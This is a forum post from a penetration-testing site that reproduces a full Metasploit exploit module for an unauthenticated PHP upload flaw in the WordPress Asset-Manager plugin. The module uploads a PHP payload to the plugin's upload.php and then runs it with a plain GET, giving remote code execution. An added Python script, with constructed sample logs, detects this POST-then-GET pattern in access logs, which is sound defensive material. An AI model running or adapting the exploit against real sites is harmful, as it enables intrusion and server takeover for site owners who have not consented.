China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: WordPress Asset-Manager PHP File Upload Vulnerability

Author: admin    Posted: 2012-12-31 09:22
This module, from the Metasploit exploit library, targets a vulnerability found in the WordPress Asset-Manager plugin version 2.0 and below. It allows PHP files to be uploaded: a user can upload a file to a temporary directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin reads the file from the "Filedata" field.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored filename on success.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The plugin stores uploads under a web-accessible temp directory, so a plain GET runs the file.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
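The module above produces a recognisable two-step pattern in web server access logs: a POST to the plugin's upload.php, then a GET for a .php file under wp-content/uploads/assets/temp/ from the same client. The following detection script is an added example written for this page; it is not part of the original post or of the Metasploit module. It parses combined-format access log lines (the sample lines are constructed, not real traffic), flags any accepted POST to the upload endpoint, any fetch of a script from the temp directory, and escalates to critical when the same source IP does both within a configurable window. Only the two URI paths are taken from the module; the severity labels and the 300-second window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample access log lines (Apache/nginx combined format). Not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Dec/2012:09:20:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [31/Dec/2012:09:20:03 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 48 "-" "Mozilla/5.0"
203.0.113.5 - - [31/Dec/2012:09:20:04 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzxw.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [31/Dec/2012:09:21:10 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 60 "-" "Mozilla/5.0"
198.51.100.7 - - [31/Dec/2012:09:21:11 +0000] "GET /wordpress/wp-content/uploads/assets/temp/report.pdf HTTP/1.1" 200 90213 "-" "Mozilla/5.0"
192.0.2.9 - - [31/Dec/2012:09:22:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/abcde.php HTTP/1.1" 404 210 "-" "curl/7.26"
"""

# Minimal combined-log parser: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths taken from the module's request URIs above.
UPLOAD_ENDPOINT = "/wp-content/plugins/asset-manager/upload.php"
TEMP_DIR = "/wp-content/uploads/assets/temp/"
# Extensions the web server would execute rather than serve (assumed list).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def detect(lines, window_seconds=300):
    """Scan log lines and return findings as (severity, ip, description) tuples.

    - accepted POST to upload.php            -> medium (endpoint needs no auth in <= 2.0)
    - GET of a script in the temp dir        -> high if served (200), low otherwise
    - both from one IP within the window     -> critical (matches the module's sequence)
    """
    findings = []
    uploads = defaultdict(list)  # ip -> timestamps of POSTs to the upload endpoint
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip = ev["ip"]
        path = ev["path"].split("?", 1)[0]  # drop any query string
        if ev["method"] == "POST" and path.endswith(UPLOAD_ENDPOINT):
            uploads[ip].append(ev["ts"])
            if ev["status"] == 200:
                findings.append(("medium", ip, f"accepted POST to Asset-Manager upload.php ({path})"))
        elif ev["method"] == "GET" and TEMP_DIR in path and SCRIPT_EXT.search(path):
            recent = [t for t in uploads[ip]
                      if 0 <= (ev["ts"] - t).total_seconds() <= window_seconds]
            if recent:
                findings.append(("critical", ip,
                                 f"upload followed by fetch of script in temp dir: {path} (status {ev['status']})"))
            else:
                sev = "high" if ev["status"] == 200 else "low"
                findings.append((sev, ip, f"script fetched from assets temp dir: {path} (status {ev['status']})"))
    return findings


if __name__ == "__main__":
    for sev, ip, desc in detect(SAMPLE_LOG.splitlines()):
        print(f"[{sev.upper():8}] {ip:15} {desc}")
```

On the sample data the first client triggers the critical finding (POST then GET of kqzxw.php within a second), the second client only the medium one because it fetched a .pdf, and the third a low one since a 404 on a .php in the temp directory is probing rather than a successful chain. Feed real logs with `detect(open(path).readlines())`; the medium finding on its own is worth alerting on because, in the affected plugin versions, the endpoint should never receive unauthenticated traffic.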




Welcome to China Network Penetration Testing Alliance (中国网络渗透测试联盟) (https://www.cobjon.com/) Powered by Discuz! X3.2